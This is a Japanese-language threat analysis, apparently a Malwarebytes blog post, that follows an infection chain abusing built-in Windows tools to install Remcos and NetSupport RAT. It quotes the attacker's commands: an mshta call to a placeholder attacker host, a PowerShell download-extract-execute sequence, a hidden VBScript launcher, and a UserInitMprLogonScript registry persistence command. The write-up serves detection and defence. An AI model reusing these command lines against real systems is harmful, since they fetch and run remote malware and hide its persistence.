LOLBinsを使いすぎてRATを投下することはできるのか？

最近、私たちのチームはある感染の試みを発見しました。目立っていたのは巧妙さではなく、攻撃者が「環境寄生（living off the land）」のアプローチを極限まで押し通そうとしていた、その執念でした。

最終目的は、リモートアクセス型トロイの木馬（RAT）であるRemcosと、正規のリモート管理ツールでありながらRATとして悪用されることが多いNetSupport Managerを展開することでした。攻撃者が辿った道筋は、Windowsに組み込みのユーティリティ――LOLBins（Living Off the Land Binaries）――のまさに総覧でした。

RemcosとNetSupportはいずれも広く悪用されているリモートアクセスツールで、攻撃者に感染システムへの広範な制御権を与えます。また、多段階のフィッシングや感染チェーンを通じて配布されることがよくあります。

Remcos（Remote Control & Surveillanceの略）は、正規のWindows向けリモート管理・監視ツールとして販売されていますが、サイバー犯罪者に広く利用されています。いったんインストールされると、攻撃者は完全なリモートデスクトップアクセス、ファイルシステムの制御、コマンド実行、キーロギング、クリップボード監視、永続化オプション、そして横展開のためのトンネリング／プロキシ機能を利用できるようになります。

NetSupport Managerは正規のリモートサポート製品ですが、攻撃者が密かにインストールして不正アクセス用に設定すると「NetSupport RAT」になります。

この攻撃がどのように展開したのか、ネイティブコマンドを1つずつ追って見ていきましょう。

ステージ1：目立たない初期侵入

攻撃は、一見すると奇妙なコマンドから始まりました：

C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta http://[attacker-ip]/web"

ぱっと見では、なぜ単に mshta.exe を直接実行しないのか疑問に思うかもしれません。答えは防御回避にあります。

ファイルのバッチに対してコマンドを実行する正規ツールである forfiles.exe を絡めることで、攻撃者は状況をわざと分かりにくくしました。これにより、セキュリティツールが実行経路を検知しづらくなります。要するに、信頼されたプログラムが別のプログラムを静かに起動し、アラートを引き起こしにくいチェーンを形成しているのです。

ステージ2：ファイルレスのダウンロードとステージング

 mshta コマンドはリモートのHTAファイルを取得し、それが直ちに cmd.exe, を生成して、手の込んだPowerShellのワンライナーを展開しました：

powershell.exe -NoProfile -Command

curl -s -L -o "<random>.pdf" (attacker-ip}/socket;

mkdir "<random>";

tar -xf "<random>.pdf" -C "<random>";

Invoke-CimMethod Win32_Process Create "<random>\glaxnimate.exe"

これは次のことを行います：

PowerShell組み込みのcurlで、PDFに偽装したペイロードをダウンロードしますが、実体はTARアーカイブでした。続いて tar.exe （これも信頼されたWindowsの追加ツール）が、それをランダムな名前のフォルダーに展開します。しかし、この一連の主役は glaxnimate.exe――実在するアニメーションソフトをトロイ化したもので、実行時に感染をさらに進めるよう仕込まれていました。ここでも攻撃者はWindows標準のツールだけに依存しており、EXEドロッパーやマクロは一切登場しません。

ステージ3：見え見えの場所でのステージング

次に何が起きたのでしょうか？ 悪意あるGlaxnimateのコピーは、部分的なファイルを C:\ProgramData に書き込み始めました：

• SETUP.CAB.PART
• PROCESSOR.VBS.PART
• PATCHER.BAT.PART

なぜ .PART ファイルなのか？ これは典型的なマルウェアのステージングです。適切なタイミング――あるいはダウンロード完了まで――ファイルを未完成の状態で落としておきます。安全が確保できたら、ファイル名を変更したり完成させたりして、次のペイロードを進めるために利用します。

ステージ4：起動のスクリプト化

マルウェアはスクリプトが大好物です――特に、誰にも見られないスクリプトはなおさらです。完全に書き込まれると、Windows Script Hostが呼び出され、VBScriptコンポーネントが実行されました：

"C:\Windows\System32\WScript.exe" "C:\ProgramData\processor.vbs"

このVBScriptはIWshShell3.Runを使って、被害者にポップアップや黒い画面を一切見せないよう、非表示ウィンドウで cmd.exe を静かに生成しました。

IWshShell3.Run("cmd.exe /c %ProgramData%\patcher.bat", "0", "false");

バッチファイルの役割は？

expand setup.cab -F:* C:\ProgramData

 expand ユーティリティを使って、先に落とされた setup.cab アーカイブの内容をすべてProgramDataに展開し、NetSupport RATとその補助ファイルを実質的に解凍します。

ステージ5：隠された永続化

再起動後もツールが生き残るように、攻撃者は目立ちにくいレジストリ経由の手段を選びました：

reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\PATCHDIRSEC\client32.exe" /f

昔ながらの Run キーとは異なり、 UserInitMprLogonScript はよくある容疑者ではなく、目に見えるウィンドウも開きません。ユーザーがログインするたびに、RATは静かに便乗して起動します。

最後に

この感染チェーンはLOLBins悪用の見本であり、攻撃者がWindowsのツールをユーザーに対して逆用するのが大好きだという証拠です。全工程がWindows組み込みツールに依存しています：forfiles、mshta、curl、tar、スクリプトエンジン、reg、そしてexpand。

では、LOLBinsを使いすぎてRATを投下することはできるのでしょうか？ この攻撃者が示すとおり、答えは「まだだ」です。しかし、手順を増やすほどノイズも増え、防御側が辿れる痕跡（パンくず）も多く残ります。脅威アクターが悪用するツールが増えるほど、その指紋はより固有のものになります。

警戒を怠らないでください。LOLBins悪用の兆候を監視し、tar.exeで開く必要がある.pdfは決して信用しないことです。

LOLBinsが多用されているにもかかわらず、Malwarebytesは依然としてこの攻撃を検知してブロックします。攻撃者のIPアドレスをブロックし、システム上に投下された後のRemcos RATとNetSupportクライアントの両方を検知しました。